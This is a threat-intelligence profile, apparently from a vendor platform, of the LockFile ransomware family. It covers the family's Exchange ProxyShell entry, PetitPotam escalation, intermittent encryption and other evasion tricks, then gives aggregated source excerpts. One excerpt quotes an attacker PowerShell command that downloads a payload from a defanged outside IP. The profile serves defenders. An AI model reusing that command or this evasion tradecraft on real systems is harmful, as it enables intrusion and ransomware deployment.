LockFile is a Windows ransomware family first observed in mid-2021 and associated with enterprise intrusions against on-premises Microsoft Exchange environments. It became notable for early use of intermittent encryption, encrypting alternating 16-byte portions of files rather than fully encrypting them or only encrypting initial blocks. This approach can leave files statistically similar to their original contents while still rendering them unusable, helping the malware evade some anti-ransomware detections based on file-content analysis and heavy write patterns.
LockFile has been linked to exploitation of Microsoft Exchange ProxyShell vulnerabilities for initial compromise of unpatched servers, and reporting also associates some intrusions with use of the PetitPotam NTLM relay technique to reach domain controllers and expand control across Windows domain environments. After gaining access, operators were observed deploying ransomware broadly in enterprise networks, including through Active Directory mechanisms.
The malware uses multiple defense-evasion measures. Samples have been described as packed and malformed to hinder static analysis. LockFile terminates business-critical processes, including virtualization and database-related services, using WMI or WMIC so locked files can be encrypted and process termination appears less directly attributable to the ransomware. It also uses memory-mapped I/O so modified file contents are flushed to disk by the Windows System process, reducing obvious malicious write activity from the ransomware process itself. After encryption, LockFile drops an HTA ransom note, appends a dedicated extension to encrypted files, and deletes its own executable to complicate incident response.
LockFile targeted organizations across multiple industries worldwide, with observed victims including financial, manufacturing, engineering, legal, business services, travel, and tourism entities. Its ransom-note styling has been noted as resembling LockBit 2.0, but any deeper relationship to other ransomware families remains unconfirmed. LockFile is also historically significant because its intermittent-encryption model was later adopted more broadly across the ransomware ecosystem.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
4 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The flaws are tracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. | A Hive ransomware affiliate has been targeting Microsoft Exchange servers vulnerable to ProxyShell security issues... ProxyShell is a set of three vulnerabilities in the Microsoft Exchange Server that allow remote code execution without authentication on vulnerable deployments. The flaws are tracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. | The flaws have been used by multiple threat actors, including ransomware like Conti, BlackByte, Babuk, Cuba, and LockFile, after exploits became available.
Yesterday a researcher alerted me to this blog from Symantec, fingering an unknown Exchange vulnerability being used to deploy ransomware: LockFile: Ransomware Uses PetitPotam Exploit to Compromise Windows Domain Controllers
The flaws are tracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. | The flaws have been used by multiple threat actors, including ransomware like Conti, BlackByte, Babuk, Cuba, and LockFile, after exploits became available.
The flaws are tracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. | The flaws have been used by multiple threat actors, including ransomware like Conti, BlackByte, Babuk, Cuba, and LockFile, after exploits became available.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Since around 2021, HUI Loader variants have been deployed in operations involving the ransomware families LockFile, AtomSilo, NightSky, LockBit 2.0, and Pandora.
20 distinct techniques documented for this family, organized by ATT&CK tactic.
Once deposited, the malware also takes steps to terminate critical processes associated with virtualization software and databases via the Windows Management Interface (WMI), before proceeding to encrypt critical files and objects.
These files are copied into the “sysvol\domain\scripts” directory. This directory is used to deploy scripts to network clients when they authenticate to the domain controller. This means that any clients that authenticate to the domain after these files have been copied over will execute them.
On exploitation, the attacker executes a PowerShell command such as the following: powershell wget hxxp://209.14.0[.]234:46613/VcEtrKighyIFS5foGNXH
LockFile uses multiple techniques designed to evade detection, starting with its own executable file which is both packed and malformed. The first section of the file is full of zeroes and is followed by a second section that contains encoded data.
What's more, the ransomware deletes itself from the system post successful encryption of all the documents on the machine, meaning that 'there is no ransomware binary for incident responders or antivirus software to find or clean up.'
This active_desktop_render.dll file, when loaded by the active_desktop_launcher.exe, attempts to load and decrypt a file in the local directory called “desktop.ini”. If the file is successfully loaded and decrypted, shellcode from the file is executed.
Once deposited, the malware also takes steps to terminate critical processes associated with virtualization software and databases via the Windows Management Interface (WMI), before proceeding to encrypt critical files and objects, and display a ransomware note. | Called LockFile, the operators of the ransomware have been found exploiting recently disclosed flaws such as ProxyShell and PetitPotam to compromise Windows servers and deploy file-encrypting malware that scrambles only every alternate 16 bytes of a file, thereby giving it the ability to evade ransomware defences.
Intermittent encryption helps the ransomware to evade detection by some ransomware protection solutions ... By letting the System process perform the WriteFile operation ... this trick alone can be successful in evading detection by some behavior-based anti-ransomware solutions
16 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
20 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A ransomware family observed exploiting ProxyShell vulnerabilities on unpatched on-premises Microsoft Exchange servers to gain access and compromise targets.
Referenced as the ransomware family Atom Silo closely resembles; also associated in the article with similar DLL sideloading and driver-abuse tradecraft.
Ransomware family using ProxyShell and intermittent encryption to evade anti-ransomware detection.
Ransomware family that breaches unpatched on-premises Microsoft Exchange servers via ProxyShell and uses PetitPotam NTLM relay to gain domain control. It encrypts every other 16 bytes of files ('intermittent encryption') to evade statistical and behavior-based ransomware detection, uses memory-mapped I/O so the OS writes encrypted data to disk, appends a .lockfile extension, drops an HTA ransom note, terminates business-critical processes, and deletes itself after encryption.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.